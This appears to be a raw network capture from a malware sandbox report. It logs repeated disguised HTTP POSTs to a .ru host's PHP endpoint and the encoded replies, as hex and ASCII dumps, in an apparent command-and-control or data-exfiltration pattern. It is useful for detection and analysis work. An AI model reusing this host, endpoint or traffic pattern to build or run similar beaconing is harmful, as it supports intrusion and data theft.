                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0f 2b 1d 2a 13 34 2b 05 0c 24 3f 2e 5e 29 13 2e 03 3e 30 3f 42 3d 16 11 55 26 5e 3c 5a 3c 5e 31 1a 27 2f 29 0e 36 3e 2b 0e 28 3a 21 46 04 1e 21 10 34 00 06 10 29 33 32 0e 3d 3c 3c 17 23 20 25 1a 30 3a 21 51 26 3b 30 0f 35 05 3b 56 25 3c 3b 50 38 34 32 5d 2e 09 21 1f 25 3e 2c 5e 0e 12 39 51 31 30 35 5a 3f 01 26 02 33 20 3b 12 26 28 39 5a 30 3b 01 56 23 06 32 06 3f 0e 1a 0d 33 06 20 1d 3a 05 28 00 30 39 28 1e 2a 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 +*4+$?.^).>0?B=U&^<Z<^1'/)6>+(:!F!4)32=<<# %0:!Q&;05;V%<;P842].!%>,^9Q105Z?&3 ;&(9Z0;V#2?3 :(09(*2!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:21.167397976 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:21.502115011 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:22.031809092 CET971INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:21 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bLwHVOkLK57SK3kMg%2F0YFxK6k65hkEW8xHk6tNNd%2BMipkC%2F%2BjfxwtCabyxZhJJbvCV6kdaYXbAfKM3JbKkew0E1n3d%2F9Vypa7Qcntxg52AWXyfAo%2FhmEKXoHDnu2Q1JtfXXVvXDC"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409ee6faa42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10278&min_rtt=1677&rtt_var=6945&sent=387&recv=501&lost=0&retrans=0&sent_bytes=53585&recv_bytes=349120&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0a 28 24 31 01 20 2b 06 1c 24 2c 25 06 3d 03 0b 5b 2a 23 23 42 29 5e 3c 09 25 38 28 5b 2b 06 2a 43 27 3c 32 57 20 3d 38 53 28 3a 21 46 04 1e 21 13 20 07 34 59 3e 30 21 54 3d 02 3c 5c 21 0e 31 5c 30 3a 26 0a 26 38 2f 1d 22 12 06 08 25 3c 38 0a 2c 24 3d 06 39 1e 2a 0e 24 3e 2c 5e 0e 12 39 51 31 0e 13 10 3f 5e 25 12 27 23 23 51 26 3b 0f 1f 26 3b 2f 54 23 16 0b 15 3f 1e 3b 10 33 3c 20 1e 2d 3b 3f 5c 33 2a 34 56 3d 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 ($1 +$,%=[*##B)^<%8([+*C'<2W =8S(:!F! 4Y>0!T=<\!1\0:&&8/"%<8,$=9*$>,^9Q1?^%'##Q&;&;/T#?;3< -;?\3*4V="!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:22.032783985 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2076
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:22.370179892 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:22.894323111 CET979INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:22 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2F70MybE0M5%2Fc5b4X%2Bp%2FHPEcvDO7MvAYGIFwsQf48513QY%2BxWQ6NqTwZfDGWalYr%2FzWLKQ28CWf%2FgIn8f%2F9lMOusJU78w0rsqbAMr6vNNSuPqkx2%2BiNKpEzQ1eh2pe2sK7Vi7%2FgT"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409f3cdf442cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11048&min_rtt=1677&rtt_var=8901&sent=393&recv=506&lost=0&retrans=0&sent_bytes=54581&recv_bytes=351502&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 53 2b 34 29 06 37 3b 2c 1e 33 2c 07 06 3d 3d 29 13 2a 0e 33 45 3d 5e 34 08 32 06 0e 5a 28 5e 2d 19 25 2f 00 50 36 3e 3b 0f 28 2a 21 46 04 1e 21 59 37 3d 2c 1d 28 23 2d 1f 3e 3f 3b 02 22 30 22 07 27 39 3a 09 27 3b 24 0a 35 3c 2f 13 24 3f 27 52 3b 24 32 5b 2f 33 31 10 25 2e 2c 5e 0e 12 39 1a 32 56 25 11 2b 38 3a 01 24 0e 19 51 31 02 31 11 24 3b 0d 1d 23 06 25 5d 3c 0e 3f 10 24 3f 23 0a 2e 5d 20 07 24 3a 2f 0e 3d 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#S+4)7;,3,==)*3E=^42Z(^-%/P6>;(*!F!Y7=,(#->?;"0"'9:';$5</$?'R;$2[/31%.,^92V%+8:$Q11$;#%]<?$?#.] $:/=!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:22.895291090 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:23.227587938 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:23.758641005 CET968INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:23 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fv8qxbhNWL7CFi7HMVFKojEbTo7XVOYYoLrO5orHEKswrE7Tns3M1sEOx26RzDG%2FkGG4iQOkzMUlWnEgapjzuVgh4x0%2B%2FA%2BzXgm9QqjhXq061t6c5UWrnuYQXVWdA7ZwYLxma3Di"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409f92c1442cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11900&min_rtt=1677&rtt_var=10702&sent=399&recv=511&lost=0&retrans=0&sent_bytes=55585&recv_bytes=353908&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0f 2b 1d 26 59 37 02 34 1f 33 2c 26 5e 29 5b 3e 01 2a 09 3f 45 3d 3b 3b 55 32 28 27 03 3c 06 00 07 24 11 25 0c 20 3d 06 1c 2a 2a 21 46 04 1e 22 01 23 2e 0e 13 29 33 32 0e 3e 2f 3c 5f 35 33 2a 05 30 04 2d 52 31 38 2b 57 21 3f 23 56 33 3f 33 51 3b 24 26 19 2d 56 39 55 25 3e 2c 5e 0e 12 39 53 25 30 35 5c 3f 16 32 03 24 20 2b 55 25 3b 3a 01 33 05 0d 55 20 01 3d 58 28 0e 33 1d 30 11 2b 0a 2e 3b 09 5d 24 3a 30 50 2b 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 +&Y743,&^)[>*?E=;;U2('<$% =**!F"#.)32>/<_53*0-R18+W!?#V3?3Q;$&-V9U%>,^9S%05\?2$ +U%;:3U =X(30+.;]$:0P+2!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:23.759478092 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:24.091854095 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:24.616415977 CET980INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:24 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=95SxAapgtNZA5MArDkMrltLYl9Y1ShG%2B%2FaqRj8EIw9GsF8CjmY%2FINFRUvumENN41bqf63XuVPjLJlsG%2F7i%2FOb6eQrNshfXpG%2Bee%2FTkUoTBVGRIz%2B4oUQ%2BsDmpLZM%2FJ6yWdUuIYU9"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409fe998642cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11961&min_rtt=1677&rtt_var=10565&sent=405&recv=516&lost=0&retrans=0&sent_bytes=56578&recv_bytes=356314&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 1f 28 1a 26 10 21 2b 34 1f 30 05 3e 16 3d 3d 2a 05 3e 1e 2c 1c 2b 38 37 1c 26 06 0e 58 3f 16 2a 08 24 2f 22 50 21 5b 30 1c 2a 2a 21 46 04 1e 21 5d 20 10 24 5e 2a 23 29 56 2a 02 33 02 22 30 21 1a 24 3a 2a 0b 31 06 27 10 35 02 27 1d 33 02 02 0b 2d 24 3e 14 2d 0e 21 56 25 3e 2c 5e 0e 12 3a 0a 25 1e 3e 05 28 01 26 03 24 23 24 08 26 2b 29 11 27 15 3f 1c 37 16 3d 14 29 23 3f 57 30 3c 34 53 3a 15 28 04 24 2a 20 56 29 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#(&!+40>==*>,+87&X?*$/"P![0**!F!] $^*#)V*3"0!$:*1'5'3-$>-!V%>,^:%>(&$#$&+)'?7=)#?W0<4S:($* V)!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:24.617659092 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:24.950383902 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:25.535661936 CET964INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:25 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fCUonGQWjJnFiJDmdFxL3ZSu8hu81lCwC6PqDh9cJnz7Ab3vOLtNZbp%2FfDZZuxtRTi0G6VsqChEQaXMt5tHBr4XSGVyPFfVqn%2BEQfopg7imaGCu8tdRH5cFD7QcxTxjpNIrjWwGz"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a03ff6b42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12081&min_rtt=1677&rtt_var=10625&sent=411&recv=521&lost=0&retrans=0&sent_bytes=57583&recv_bytes=358720&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 57 2b 0a 31 01 34 3b 0d 0f 27 3c 3e 5c 29 2d 29 10 3e 0e 37 08 2a 2b 23 54 25 16 3f 00 3f 01 31 1d 24 01 2e 55 36 3e 30 57 2b 00 21 46 04 1e 21 5c 37 00 06 5f 2a 55 2e 0d 29 05 2c 5b 21 20 36 06 27 39 39 19 32 06 02 0c 22 2f 20 08 33 02 06 08 2d 34 36 5f 2e 30 26 0a 25 14 2c 5e 0e 12 39 15 31 33 35 5a 29 38 3a 00 30 56 2b 55 32 3b 2e 05 33 05 27 51 34 01 3d 5c 3c 30 33 1e 24 01 24 1e 39 02 38 07 26 39 37 0f 2a 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#W+14;'<>\)-)>7*+#T%??1$.U6>0W+!F!\7_*U.),[! 6'992"/ 3-46_.0&%,^9135Z)8:0V+U2;.3'Q4=\<03$$98&97*!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:25.536493063 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:25.870805025 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:26.361710072 CET813INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:26 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mFSoIquGireCoZH0p3IPRaQfrzbu9fhD%2FDEWY%2BmbwogxkGNAXEvzvvP%2BSFXKhfwCvqMYQRoRgmeHa%2Fkzt%2BEIkLUC4s%2F7lMzCsEalvM1OHCt%2BsQ1%2BoTL7BjvqcoswoMK76Cyt4eyw"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a09bdad42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12399&min_rtt=1677&rtt_var=11093&sent=416&recv=526&lost=0&retrans=0&sent_bytes=58572&recv_bytes=361126&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Dec 28, 2024 20:43:26.572885036 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:26.905605078 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:27.391680002 CET965INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:27 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vwLM%2BlSGcHCYGwOjOeOHEj9wmbuWiEH4Lr9TKmnAORVPkEA2d7RZKu%2FX36eoIHoYjh2vpeUvFQQiZ1o1trtkVxlXCKh0R6FGgbMlKePdJhGtG6DO0v8Xh0weGKAWUX%2Ff4j15reHd"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a102cbd42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12817&min_rtt=1677&rtt_var=9259&sent=421&recv=532&lost=0&retrans=0&sent_bytes=59573&recv_bytes=363532&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 55 28 0a 22 59 23 15 38 54 30 02 00 5e 2a 04 3d 10 3e 30 2c 1c 2b 28 11 1d 32 06 2c 59 3f 5e 22 09 33 3f 29 0c 35 3d 37 0c 3c 00 21 46 04 1e 21 5b 37 58 2f 03 29 55 2a 0c 2a 2f 33 05 35 33 29 5d 26 2a 3d 57 26 06 27 56 21 5a 27 1c 30 2f 3b 53 3b 27 2d 07 2f 33 39 1e 25 14 2c 5e 0e 12 39 51 26 09 36 03 2b 38 1b 5b 33 30 37 12 31 02 31 10 27 38 24 08 21 2b 3a 00 29 30 27 1d 30 01 0e 1f 2e 28 27 16 30 3a 3f 0f 29 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#U("Y#8T0^*=>0,+(2,Y?^"3?)5=7<!F![7X/)U**/353)]&*=W&'V!Z'0/;S;'-/39%,^9Q&6+8[30711'8$!+:)0'0.('0:?)"!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:27.393719912 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:27.726210117 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:28.738457918 CET977INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:28 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5d%2B%2BN30gcTJ%2B7FFbmHouF7J%2Bbt0n2lUxNbZtpBLWY7NL5eMo4e%2BeSrnoydCGrf%2B434HB%2Fv2hdwQU8q9UtYceXPGsc3OW4lt%2BhUfJgtr%2BrNGnYlfsyjM91KxkqLpD8NX83NO2L5yT"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a154ab242cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11487&min_rtt=1677&rtt_var=7079&sent=426&recv=537&lost=0&retrans=0&sent_bytes=60563&recv_bytes=365938&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0a 3f 1a 35 01 37 15 20 52 30 3c 3d 00 29 2d 3d 5d 28 33 3c 1d 2a 01 34 0c 26 01 20 13 3c 3b 36 43 24 2c 31 09 21 2e 2f 0f 3c 00 21 46 04 1e 21 1e 20 00 23 07 29 55 2d 54 3d 12 0e 5f 21 09 26 05 30 14 25 51 25 3b 23 1e 35 2c 02 0e 27 2c 2f 1a 38 27 22 5e 2d 0e 29 54 26 3e 2c 5e 0e 12 39 53 25 0e 21 5c 2b 38 14 05 24 09 34 0d 25 2b 26 05 24 02 23 56 20 06 0c 07 29 30 33 1e 24 2f 06 10 2e 15 23 5d 33 3a 2f 09 29 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 ?57 R0<=)-=](3<*4& <;6C$,1!./<!F! #)U-T=_!&0%Q%;#5,',/8'"^-)T&>,^9S%!\+8$4%+&$#V )03$/.#]3:/)!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:28.739272118 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:28.739329100 CET977INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:28 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5d%2B%2BN30gcTJ%2B7FFbmHouF7J%2Bbt0n2lUxNbZtpBLWY7NL5eMo4e%2BeSrnoydCGrf%2B434HB%2Fv2hdwQU8q9UtYceXPGsc3OW4lt%2BhUfJgtr%2BrNGnYlfsyjM91KxkqLpD8NX83NO2L5yT"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a154ab242cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11487&min_rtt=1677&rtt_var=7079&sent=426&recv=537&lost=0&retrans=0&sent_bytes=60563&recv_bytes=365938&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0a 3f 1a 35 01 37 15 20 52 30 3c 3d 00 29 2d 3d 5d 28 33 3c 1d 2a 01 34 0c 26 01 20 13 3c 3b 36 43 24 2c 31 09 21 2e 2f 0f 3c 00 21 46 04 1e 21 1e 20 00 23 07 29 55 2d 54 3d 12 0e 5f 21 09 26 05 30 14 25 51 25 3b 23 1e 35 2c 02 0e 27 2c 2f 1a 38 27 22 5e 2d 0e 29 54 26 3e 2c 5e 0e 12 39 53 25 0e 21 5c 2b 38 14 05 24 09 34 0d 25 2b 26 05 24 02 23 56 20 06 0c 07 29 30 33 1e 24 2f 06 10 2e 15 23 5d 33 3a 2f 09 29 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 ?57 R0<=)-=](3<*4& <;6C$,1!./<!F! #)U-T=_!&0%Q%;#5,',/8'"^-)T&>,^9S%!\+8$4%+&$#V )03$/.#]3:/)!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:29.232881069 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:29.422972918 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:29.597209930 CET963INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:29 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gFQn8tJKHdjZGSYXPwIj%2BVUwluptPA193HuTdhNlHYt8FsnVOAmTKyB3nrOYEUl3jRhAkO08uQWUM6UDNXpyvdOOBHQat%2B1TMKkFRCxCu4DBBH1kAeX9UPGpfJaG2o232MKVmTDm"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a1dbcf642cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11980&min_rtt=1677&rtt_var=8782&sent=431&recv=542&lost=0&retrans=0&sent_bytes=61565&recv_bytes=368344&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 10 3c 24 2e 5b 37 15 30 1f 27 12 21 06 29 3d 26 00 3e 30 23 43 3e 28 2b 57 27 38 38 58 3c 3b 22 07 27 01 21 0d 22 2d 37 0c 2b 10 21 46 04 1e 21 59 20 3d 2b 02 29 33 31 1e 3e 02 05 02 22 1e 25 14 26 29 26 0a 31 06 23 1f 35 2c 2c 0c 24 3c 30 0b 38 24 2e 17 2f 33 25 56 26 3e 2c 5e 0e 12 39 56 26 1e 25 5c 29 3b 26 04 27 09 3f 55 31 15 21 12 24 5d 2c 0e 23 16 04 04 2b 30 19 53 26 2c 20 1f 2d 15 09 5d 33 29 34 50 3d 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#<$.[70'!)=&>0#C>(+W'88X<;"'!"-7+!F!Y =+)31>"%&)&1#5,,$<08$./3%V&>,^9V&%\);&'?U1!$],#+0S&, -]3)4P="!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:29.598027945 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:29.930958986 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:30.459198952 CET966INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:30 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BMFjjIJ0Ualn5gPb85qQoEU8H%2FzWwrft4NBp5jB3UNS9ih1%2BrVQxXszx3vF4aLWYyQBkuH%2FIvc7UJsUofS4vnVEtOFCi4yGPcqUpdF7MC4FP1FZ1txo0aGaP6SKV9zSmanCFMEnk"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a231b8042cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12586&min_rtt=1677&rtt_var=10370&sent=436&recv=547&lost=0&retrans=0&sent_bytes=62553&recv_bytes=370750&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
